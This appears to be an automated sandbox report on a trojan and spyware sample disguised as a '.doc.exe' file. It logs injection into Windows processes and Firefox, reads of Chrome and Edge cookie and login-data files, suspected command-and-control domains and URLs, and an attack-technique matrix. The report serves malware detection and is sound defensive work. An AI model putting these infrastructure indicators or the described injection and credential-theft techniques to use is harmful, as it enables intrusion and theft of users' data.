        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtQuerySystemInformation: Direct from: 0x772547EC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtAllocateVirtualMemory: Direct from: 0x77252B0C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtOpenSection: Direct from: 0x77252D2C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtQueryAttributesFile: Direct from: 0x77252D8C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtSetInformationProcess: Direct from: 0x77252B7C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtTerminateThread: Direct from: 0x77252EEC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtReadVirtualMemory: Direct from: 0x77252DAC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtProtectVirtualMemory: Direct from: 0x77247A4E
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtOpenFile: Direct from: 0x77252CEC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtAllocateVirtualMemory: Direct from: 0x77253BBC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; NtQueryInformationToken: Direct from: 0x77252BCC
        Source: C:\Users\user\Desktop\List of Items0001.doc.exe; Section loaded: NULL target: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\List of Items0001.doc.exe; Section loaded: NULL target: C:\Windows\SysWOW64\TapiUnattend.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; Section loaded: NULL target: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe protection: read write
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; Section loaded: NULL target: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; Thread register set: target process: 7320
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; Thread APC queued: target process: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
        Source: C:\Users\user\Desktop\List of Items0001.doc.exe; Process created: C:\Users\user\Desktop\List of Items0001.doc.exe "C:\Users\user\Desktop\List of Items0001.doc.exe"
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe; Process created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: MzAJhEkohQv.exe, 00000004.00000000.674131435485.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678884423351.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000000.674273505654.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
        Source: MzAJhEkohQv.exe, 00000004.00000000.674131435485.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678884423351.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000000.674273505654.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
        Source: MzAJhEkohQv.exe, 00000004.00000000.674131435485.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678884423351.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000000.674273505654.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
        Source: MzAJhEkohQv.exe, 00000004.00000000.674131435485.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678884423351.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000000.674273505654.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: ^Program Managera
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWndR
        Source: C:\Users\user\Desktop\List of Items0001.doc.exe; Code function: 0_2_00403640 EntryPoint, SetErrorMode, GetVersionExW, GetVersionExW, GetVersionExW, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, lstrcatW, lstrcatW, lstrcatW, lstrcmpiW, SetCurrentDirectoryW, DeleteFileW, CopyFileW, CloseHandle, OleUninitialize, ExitProcess, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess

        Stealing of Sensitive Information

        Source: Yara match; File source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\TapiUnattend.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match; File source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
        Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
        Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
        Privilege Escalation: 1 Access Token Manipulation; 312 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
        Defense Evasion: 11 Masquerading; 2 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 312 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 12 Obfuscated Files or Information; 1 DLL Side-Loading
        Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
        Discovery: 121 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 2 File and Directory Discovery; 14 System Information Discovery; Remote System Discovery; System Owner/User Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
        Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
        Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
        Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

        [Behavior graph. ID: 1516506; Sample: List of Items0001.doc.exe; Startdate: 24/09/2024; Architecture: WINDOWS; Score: 100]

        Source | Detection | Scanner | Label
        List of Items0001.doc.exe | 10% | Virustotal
        List of Items0001.doc.exe | 13% | ReversingLabs
        List of Items0001.doc.exe | 100% | Avira | HEUR/AGEN.1331791

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll | 0% | ReversingLabs

        No Antivirus matches

        Source | Detection | Scanner | Label
        wamuk.org | 0% | Virustotal
        chalet-tofane.net | 8% | Virustotal
        rmgltd.services | 0% | Virustotal
        tracy.club | 1% | Virustotal
        wdcb30.top | 0% | Virustotal
        wdeb18.top | 0% | Virustotal
        www.prj81oqde1.buzz | 1% | Virustotal
        inf30027group23.xyz | 2% | Virustotal
        www.wdeb18.top | 2% | Virustotal
        www.useanecdotenow.tech | 0% | Virustotal
        www.leadlikeyoumeanit.xyz | 0% | Virustotal
        www.52ywq.vip | 0% | Virustotal
        www.inf30027group23.xyz | 3% | Virustotal
        www.chalet-tofane.net | 2% | Virustotal
        www.mfgarage.net | 0% | Virustotal
        http://inf30027group23.xyz/ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9D0%Avira URL Cloudsafe
        http://www.moritynomxd.xyz/cwcw/?Nze=C0klVT&7LY=3fH1WiLe5NpDISOWCdAKu+JUhLzC/sqp3A2oBoIvbsZ9+Jm1ViaVTs8UuGIX6p5GG1E2J7RPBqURkEGv9bY/YwLNVIBjQ4Yq7BF1VQnFI9fOsqz7wsM7CnM=0%Avira URL Cloudsafe
        http://schemas.micro0%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-l0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
        http://www.prj81oqde1.buzz/dq8w/0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svg0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svgz0%Avira URL Cloudsafe
Name, IP, Active, Malicious, Antivirus Detection, Reputation
Name, Malicious, Antivirus Detection, Reputation
Name, Source, Malicious, Antivirus Detection, Reputation
                            • Avira URL Cloud: safe
                            unknown
                            https://api.msn.coFoexplorer.exe, 00000009.00000002.678894303006.0000000008F2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677551387374.0000000008F2D000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.msn.com/X6explorer.exe, 00000009.00000000.677551987614.00000000090FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000090FD000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.msn.com/sports/blended?market=en-us&satoriid=3e4b6c3b-d87a-8603-8e90-e93f0f328660&user=mexplorer.exe, 00000009.00000000.677560796859.000000000C7F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C7F0000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://htmlcodex.comTapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://dts.gnpge.comexplorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://wamuk.org/fList of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://windows.msn.com/shellexplorer.exe, 00000009.00000000.677566616313.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678916614529.00000000106AA000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.brainchainllc.online/__media__/design/underconstructionnotice.php?d=brainchainllc.onlineTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://wamuk.org/jList of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cdn.consentmanager.netfirefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://wamuk.org/css/NxTelX253.bineList of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEMexplorer.exe, 00000009.00000000.677560796859.000000000C352000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C352000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://inf30027group23.xyz/ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9DTapiUnattend.exe, 00000005.00000002.677677825516.0000000005166000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.00000000038F6000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015E26000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.microexplorer.exe, 00000009.00000000.677553291897.0000000009580000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.678885890827.0000000002B90000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677554073945.000000000A8D0000.00000002.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.msn.com/sports/blended?market=en-lexplorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svgexplorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C506000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C506000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdList of Items0001.doc.exe, 00000003.00000001.673959496421.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svgzexplorer.exe, 00000009.00000002.678908041013.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C3A1000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://x1.c.lencr.org/0firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://x1.i.lencr.org/0firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://c.pki.goog/r/r1.crl0firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://windows.msn.cn/shellRESPexplorer.exe, 00000009.00000002.678915471542.000000001040B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677566616313.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678916614529.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565765377.000000001040B000.00000004.00000001.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.msn.coexplorer.exe, 00000009.00000002.678894303006.0000000008F2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677551387374.0000000008F2D000.00000004.00000001.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://i1.cdn-image.com/__media__/pics/28903/search.png)TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.msn.com/sports/blend%explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://login.partner.microsoftonline.cn/RESPQSexplorer.exe, 00000009.00000002.678916040962.00000000105C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677566217210.00000000105C7000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            Joe Sandbox version: 41.0.0 Charoite
                            Analysis ID: 1516506
                            Start date and time: 2024-09-24 11:23:13 +02:00
                            Joe Sandbox product: CloudBasic
                            Overall analysis duration: 0h 17m 45s
                            Hypervisor based Inspection enabled: false
                            Report type: full
                            Cookbook file name: default.jbs
                            Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                            Run name: Suspected Instruction Hammering
                            Number of analysed new started processes analysed: 7
                            Number of new started drivers analysed: 0
                            Number of existing processes analysed: 0
                            Number of existing drivers analysed: 0
                            Number of injected processes analysed: 3
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode: default
                            Analysis stop reason: Timeout
                            Sample name: List of Items0001.doc.exe
                            Detection: MAL
                            Classification: mal100.troj.spyw.evad.winEXE@7/12@22/13
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HCA Information:
                            • Successful, ratio: 90%
                            • Number of executed functions: 85
                            • Number of non-executed functions: 299
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
                            • Excluded domains from analysis (whitelisted): self.events.data.microsoft.com, nexusrules.officeapps.live.com
                            • Execution Graph export aborted for target MzAJhEkohQv.exe, PID 3032 because it is empty
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtEnumerateKey calls found.
